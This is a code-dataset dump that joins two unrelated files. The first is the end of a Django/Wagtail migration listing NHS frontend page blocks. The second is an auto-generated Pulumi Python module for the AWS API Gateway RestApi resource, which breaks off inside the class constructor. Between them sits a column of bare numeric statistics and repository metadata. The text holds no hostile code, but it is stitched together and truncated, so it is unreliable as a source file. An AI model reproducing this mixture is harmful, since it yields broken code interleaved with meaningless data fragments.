wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.ExpanderBlock))])), ('inset_text', wagtail.core.blocks.StructBlock([('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('image', wagtail.core.blocks.StructBlock([('content_image', wagtail.images.blocks.ImageChooserBlock(required=True)), ('alt_text', wagtail.core.blocks.CharBlock(help_text='Only leave this blank if the image is decorative.', required=False)), ('caption', wagtail.core.blocks.CharBlock(required=False))])), ('panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('panel_list', wagtail.core.blocks.StructBlock([('panels', wagtail.core.blocks.ListBlock(wagtail.core.blocks.StructBlock([('left_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('right_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no label. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))]))])))])), ('grey_panel', wagtail.core.blocks.StructBlock([('label', wagtail.core.blocks.CharBlock(label='heading', required=False)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Ignore this if there is no heading. Default=3, Min=2, Max=4.', max_value=6, min_value=2)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('warning_callout', wagtail.core.blocks.StructBlock([('title', wagtail.core.blocks.CharBlock(default='Important', required=True)), ('heading_level', wagtail.core.blocks.IntegerBlock(default=3, help_text='The heading level affects users with screen readers. Default=3, Min=2, Max=4.', max_value=6, min_value=2, required=True)), ('body', wagtail.core.blocks.RichTextBlock(required=True))])), ('summary_list', wagtail.core.blocks.StructBlock([('rows', wagtail.core.blocks.ListBlock(wagtailnhsukfrontend.blocks.SummaryListRowBlock)), ('no_border', wagtail.core.blocks.BooleanBlock(default=False, required=False))]))], blank=True),
),
]
| 529.458333
| 12,224
| 0.760762
| 1,679
| 12,707
| 5.67838
| 0.077427
| 0.171911
| 0.262115
| 0.123348
| 0.934026
| 0.927837
| 0.922383
| 0.917873
| 0.917873
| 0.917873
| 0
| 0.010634
| 0.060124
| 12,707
| 23
| 12,225
| 552.478261
| 0.787658
| 0.003541
| 0
| 0
| 1
| 0.941176
| 0.265719
| 0.001817
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.411765
| 0
| 0.588235
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 13
|
6abc52e206bb4245e1f8d68290cf7adefcd045f7
| 71,567
|
py
|
Python
|
sdk/python/pulumi_aws/apigateway/rest_api.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-10T16:33:40.000Z
|
2021-11-10T16:33:40.000Z
|
sdk/python/pulumi_aws/apigateway/rest_api.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/apigateway/rest_api.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['RestApiArgs', 'RestApi']
@pulumi.input_type
class RestApiArgs:
def __init__(__self__, *,
api_key_source: Optional[pulumi.Input[str]] = None,
binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
body: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
endpoint_configuration: Optional[pulumi.Input['RestApiEndpointConfigurationArgs']] = None,
minimum_compression_size: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
policy: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a RestApi resource.
:param pulumi.Input[str] api_key_source: Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[Sequence[pulumi.Input[str]]] binary_media_types: List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] body: OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
:param pulumi.Input[str] description: Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[bool] disable_execute_api_endpoint: Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input['RestApiEndpointConfigurationArgs'] endpoint_configuration: Configuration block defining API endpoint configuration including endpoint type. Defined below.
:param pulumi.Input[int] minimum_compression_size: Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] name: Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
:param pulumi.Input[str] policy: JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
if api_key_source is not None:
pulumi.set(__self__, "api_key_source", api_key_source)
if binary_media_types is not None:
pulumi.set(__self__, "binary_media_types", binary_media_types)
if body is not None:
pulumi.set(__self__, "body", body)
if description is not None:
pulumi.set(__self__, "description", description)
if disable_execute_api_endpoint is not None:
pulumi.set(__self__, "disable_execute_api_endpoint", disable_execute_api_endpoint)
if endpoint_configuration is not None:
pulumi.set(__self__, "endpoint_configuration", endpoint_configuration)
if minimum_compression_size is not None:
pulumi.set(__self__, "minimum_compression_size", minimum_compression_size)
if name is not None:
pulumi.set(__self__, "name", name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if policy is not None:
pulumi.set(__self__, "policy", policy)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="apiKeySource")
def api_key_source(self) -> Optional[pulumi.Input[str]]:
"""
Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "api_key_source")
@api_key_source.setter
def api_key_source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_key_source", value)
@property
@pulumi.getter(name="binaryMediaTypes")
def binary_media_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "binary_media_types")
@binary_media_types.setter
def binary_media_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "binary_media_types", value)
@property
@pulumi.getter
def body(self) -> Optional[pulumi.Input[str]]:
"""
OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
"""
return pulumi.get(self, "body")
@body.setter
def body(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "body", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="disableExecuteApiEndpoint")
def disable_execute_api_endpoint(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "disable_execute_api_endpoint")
@disable_execute_api_endpoint.setter
def disable_execute_api_endpoint(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_execute_api_endpoint", value)
@property
@pulumi.getter(name="endpointConfiguration")
def endpoint_configuration(self) -> Optional[pulumi.Input['RestApiEndpointConfigurationArgs']]:
"""
Configuration block defining API endpoint configuration including endpoint type. Defined below.
"""
return pulumi.get(self, "endpoint_configuration")
@endpoint_configuration.setter
def endpoint_configuration(self, value: Optional[pulumi.Input['RestApiEndpointConfigurationArgs']]):
pulumi.set(self, "endpoint_configuration", value)
@property
@pulumi.getter(name="minimumCompressionSize")
def minimum_compression_size(self) -> Optional[pulumi.Input[int]]:
"""
Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "minimum_compression_size")
@minimum_compression_size.setter
def minimum_compression_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "minimum_compression_size", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "policy")
@policy.setter
def policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _RestApiState:
def __init__(__self__, *,
api_key_source: Optional[pulumi.Input[str]] = None,
arn: Optional[pulumi.Input[str]] = None,
binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
body: Optional[pulumi.Input[str]] = None,
created_date: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
endpoint_configuration: Optional[pulumi.Input['RestApiEndpointConfigurationArgs']] = None,
execution_arn: Optional[pulumi.Input[str]] = None,
minimum_compression_size: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
policy: Optional[pulumi.Input[str]] = None,
root_resource_id: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering RestApi resources.
:param pulumi.Input[str] api_key_source: Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN)
:param pulumi.Input[Sequence[pulumi.Input[str]]] binary_media_types: List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] body: OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
:param pulumi.Input[str] created_date: The creation date of the REST API
:param pulumi.Input[str] description: Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[bool] disable_execute_api_endpoint: Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input['RestApiEndpointConfigurationArgs'] endpoint_configuration: Configuration block defining API endpoint configuration including endpoint type. Defined below.
:param pulumi.Input[str] execution_arn: The execution ARN part to be used in `lambda_permission`'s `source_arn`
when allowing API Gateway to invoke a Lambda function,
e.g., `arn:aws:execute-api:eu-west-2:123456789012:z4675bid1j`, which can be concatenated with allowed stage, method and resource path.
:param pulumi.Input[int] minimum_compression_size: Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] name: Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
:param pulumi.Input[str] policy: JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
:param pulumi.Input[str] root_resource_id: The resource ID of the REST API's root
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider .
"""
if api_key_source is not None:
pulumi.set(__self__, "api_key_source", api_key_source)
if arn is not None:
pulumi.set(__self__, "arn", arn)
if binary_media_types is not None:
pulumi.set(__self__, "binary_media_types", binary_media_types)
if body is not None:
pulumi.set(__self__, "body", body)
if created_date is not None:
pulumi.set(__self__, "created_date", created_date)
if description is not None:
pulumi.set(__self__, "description", description)
if disable_execute_api_endpoint is not None:
pulumi.set(__self__, "disable_execute_api_endpoint", disable_execute_api_endpoint)
if endpoint_configuration is not None:
pulumi.set(__self__, "endpoint_configuration", endpoint_configuration)
if execution_arn is not None:
pulumi.set(__self__, "execution_arn", execution_arn)
if minimum_compression_size is not None:
pulumi.set(__self__, "minimum_compression_size", minimum_compression_size)
if name is not None:
pulumi.set(__self__, "name", name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if policy is not None:
pulumi.set(__self__, "policy", policy)
if root_resource_id is not None:
pulumi.set(__self__, "root_resource_id", root_resource_id)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
@property
@pulumi.getter(name="apiKeySource")
def api_key_source(self) -> Optional[pulumi.Input[str]]:
"""
Source of the API key for requests. Valid values are `HEADER` (default) and `AUTHORIZER`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-api-key-source` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-api-key-source.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "api_key_source")
@api_key_source.setter
def api_key_source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_key_source", value)
@property
@pulumi.getter
def arn(self) -> Optional[pulumi.Input[str]]:
"""
Amazon Resource Name (ARN)
"""
return pulumi.get(self, "arn")
@arn.setter
def arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "arn", value)
@property
@pulumi.getter(name="binaryMediaTypes")
def binary_media_types(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of binary media types supported by the REST API. By default, the REST API supports only UTF-8-encoded text payloads. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-binary-media-types` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-binary-media-types.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "binary_media_types")
@binary_media_types.setter
def binary_media_types(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "binary_media_types", value)
@property
@pulumi.getter
def body(self) -> Optional[pulumi.Input[str]]:
"""
OpenAPI specification that defines the set of routes and integrations to create as part of the REST API. This configuration, and any updates to it, will replace all REST API configuration except values overridden in this resource configuration and other resource updates applied after this resource but before any `apigateway.Deployment` creation. More information about REST API OpenAPI support can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
"""
return pulumi.get(self, "body")
@body.setter
def body(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "body", value)
@property
@pulumi.getter(name="createdDate")
def created_date(self) -> Optional[pulumi.Input[str]]:
"""
The creation date of the REST API
"""
return pulumi.get(self, "created_date")
@created_date.setter
def created_date(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "created_date", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.description` field. If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="disableExecuteApiEndpoint")
def disable_execute_api_endpoint(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether clients can invoke your API by using the default execute-api endpoint. By default, clients can invoke your API with the default https://{api_id}.execute-api.{region}.amazonaws.com endpoint. To require that clients use a custom domain name to invoke your API, disable the default endpoint. Defaults to `false`. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-endpoint-configuration` extension `disableExecuteApiEndpoint` property](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-swagger-extensions-endpoint-configuration.html). If the argument value is `true` and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "disable_execute_api_endpoint")
@disable_execute_api_endpoint.setter
def disable_execute_api_endpoint(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disable_execute_api_endpoint", value)
@property
@pulumi.getter(name="endpointConfiguration")
def endpoint_configuration(self) -> Optional[pulumi.Input['RestApiEndpointConfigurationArgs']]:
"""
Configuration block defining API endpoint configuration including endpoint type. Defined below.
"""
return pulumi.get(self, "endpoint_configuration")
@endpoint_configuration.setter
def endpoint_configuration(self, value: Optional[pulumi.Input['RestApiEndpointConfigurationArgs']]):
pulumi.set(self, "endpoint_configuration", value)
@property
@pulumi.getter(name="executionArn")
def execution_arn(self) -> Optional[pulumi.Input[str]]:
"""
The execution ARN part to be used in `lambda_permission`'s `source_arn`
when allowing API Gateway to invoke a Lambda function,
e.g., `arn:aws:execute-api:eu-west-2:123456789012:z4675bid1j`, which can be concatenated with allowed stage, method and resource path.
"""
return pulumi.get(self, "execution_arn")
@execution_arn.setter
def execution_arn(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "execution_arn", value)
@property
@pulumi.getter(name="minimumCompressionSize")
def minimum_compression_size(self) -> Optional[pulumi.Input[int]]:
"""
Minimum response size to compress for the REST API. Integer between `-1` and `10485760` (10MB). Setting a value greater than `-1` will enable compression, `-1` disables compression (default). If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-minimum-compression-size` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-openapi-minimum-compression-size.html). If the argument value (_except_ `-1`) is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "minimum_compression_size")
@minimum_compression_size.setter
def minimum_compression_size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "minimum_compression_size", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the REST API. If importing an OpenAPI specification via the `body` argument, this corresponds to the `info.title` field. If the argument value is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of customizations for importing the specification in the `body` argument. For example, to exclude DocumentationParts from an imported API, set `ignore` equal to `documentation`. Additional documentation, including other parameters such as `basepath`, can be found in the [API Gateway Developer Guide](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-import-api.html).
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def policy(self) -> Optional[pulumi.Input[str]]:
"""
JSON formatted policy document that controls access to the API Gateway. This provider will only perform drift detection of its value when present in a configuration. It is recommended to use the `apigateway.RestApiPolicy` resource instead. If importing an OpenAPI specification via the `body` argument, this corresponds to the [`x-amazon-apigateway-policy` extension](https://docs.aws.amazon.com/apigateway/latest/developerguide/openapi-extensions-policy.html). If the argument value is provided and is different than the OpenAPI value, the argument value will override the OpenAPI value.
"""
return pulumi.get(self, "policy")
@policy.setter
def policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy", value)
@property
@pulumi.getter(name="rootResourceId")
def root_resource_id(self) -> Optional[pulumi.Input[str]]:
"""
The resource ID of the REST API's root
"""
return pulumi.get(self, "root_resource_id")
@root_resource_id.setter
def root_resource_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "root_resource_id", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Key-value map of resource tags. .If configured with a provider `default_tags` configuration block present, tags with matching keys will overwrite those defined at the provider-level.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A map of tags assigned to the resource, including those inherited from the provider .
"""
return pulumi.get(self, "tags_all")
@tags_all.setter
def tags_all(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags_all", value)
class RestApi(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_key_source: Optional[pulumi.Input[str]] = None,
binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
